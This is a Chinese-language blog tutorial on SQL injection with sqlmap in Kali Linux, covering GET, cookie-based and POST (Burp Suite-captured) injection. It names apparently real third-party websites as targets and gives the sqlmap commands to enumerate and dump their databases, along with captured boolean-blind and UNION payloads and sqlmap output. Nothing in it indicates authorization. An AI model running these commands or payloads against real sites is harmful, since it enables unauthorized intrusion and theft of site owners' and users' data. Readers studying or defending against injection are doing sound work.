kali之sql注入

ASP:
1.网址后面加上一撇 ' 报错  and 1=1 正常显示,and1=2报错  网址:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14    (get注入

2.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbs --current-user (-u 输入目标网址 --dbs表示所有的数据库)
3.结果显示出了服务器的的操作系统为Windows2003或是 XP,数据库类型等信息,没有显示出current user
4.kali Linux打开终端 输入命令 sqlmap -u 网址 --tables 最后会显示出几个表名
5.kali Linux打开终端 输入命令 sqlmap -u 网址 -T 表名 --columns ,会拆解出几个列名(-T 指定表名 --columns代表所有的列)
6.kali Linux打开终端 输入命令 sqlmap -u 网址 -T 表名 -C 列名1,列名2 --dump (-C指定要获得的数据的列名,--dump表示下载数据



7.sql不能注入,采取cookie注入 例如  :sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --tables --level 2
8.猜解表段也是一样的:sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --tables --level 2


如果说那个站点他装了防注入程序 拿我们正规的注入就不成效果就用到cookie中转注入

sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --level 2

Place: Cookie
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=230 AND 1870=1870

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-3659 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(117)&CHR(120)&CHR(97)&CHR(113)&CHR(106)&CHR(83)&CHR(65)&CHR(100)&CHR(105)&CHR(111)&CHR(87)&CHR(110)&CHR(113)&CHR(112)&CHR(113)&CHR(113)&CHR(115)&CHR(106)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
[23:30:15] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[23:30:15] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xaweichi.com'

可以看到是cookies方式的注入

猜解表段也是一样的 sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --tables --level 2

猜解字段sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --columns -T manage --level 2

然后猜解内容

[4 columns]
+---------+-------------+
| Column  | Type        |
+---------+-------------+
| classid | numeric     |
| id      | numeric     |
| orderid | numeric     |
| title   | non-numeric |

sqlmap -u http://xaweichi.com/product_list.asp --cookie "id=230" --dump C "classid,id" -T manage --level 2






9.cookie注入不行用post注入
今天讲sqlmap post搜索框的注入



http://www.zjyingsong.com/product.asp

post注入框的注入原理 大家可以自己百度一下哦!

要进行post注入我们首先要抓包 。。

用burpsuite

打开浏览器

代理8080端口

好了 随便输入一个1字 burpsuite已经抓到包了

key=1&x=23&y=4

这条是有用的

然后我们启动sqlmap 构造一下 sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4"
Place: POST
Parameter: key
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: key=1%' AND 1393=1393 AND '%'='&x=24&y=9

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: key=-3532%' UNION ALL SELECT NULL,NULL,CHR(113)&CHR(104)&CHR(101)&CHR(110)&CHR(113)&CHR(103)&CHR(109)&CHR(84)&CHR(80)&CHR(98)&CHR(100)&CHR(74)&CHR(105)&CHR(102)&CHR(102)&CHR(113)&CHR(105)&CHR(114)&CHR(108)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&x=24&y=9
---
[23:58:56] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access
[23:58:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.zjyingsong.com'
Place: POST


嗯   post型注入 然后我们就可以猜解了

和上节课的语法完全一模一样 sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --tables //猜解表段

sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --columns -T 表段 //猜解字段

sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --dump C "内容,内容," -T 刚才的表段 //猜解内容

PHP:
1.网址后面加上一撇 ' 报错,可以看到数据库信息
2.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbs --current-user ,提示id 有注入漏洞
3.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbms mysql -D 数据库 --tables  (--dbms 指定数据库 -D指定具体数据库(名称 ))
4.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbms mysql  --tables   第3步在指定具体数据库的情况下没有返回任何表,这里直接拆解表名
5..kali Linux打开终端 输入命令 sqlmap -u 网址 --dbms mysql -T 表名 --columns
6.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbms mysql -T 表名 -C 列名,列名 --dump

原文地址:https://www.cnblogs.com/sugarxt/p/10557684.html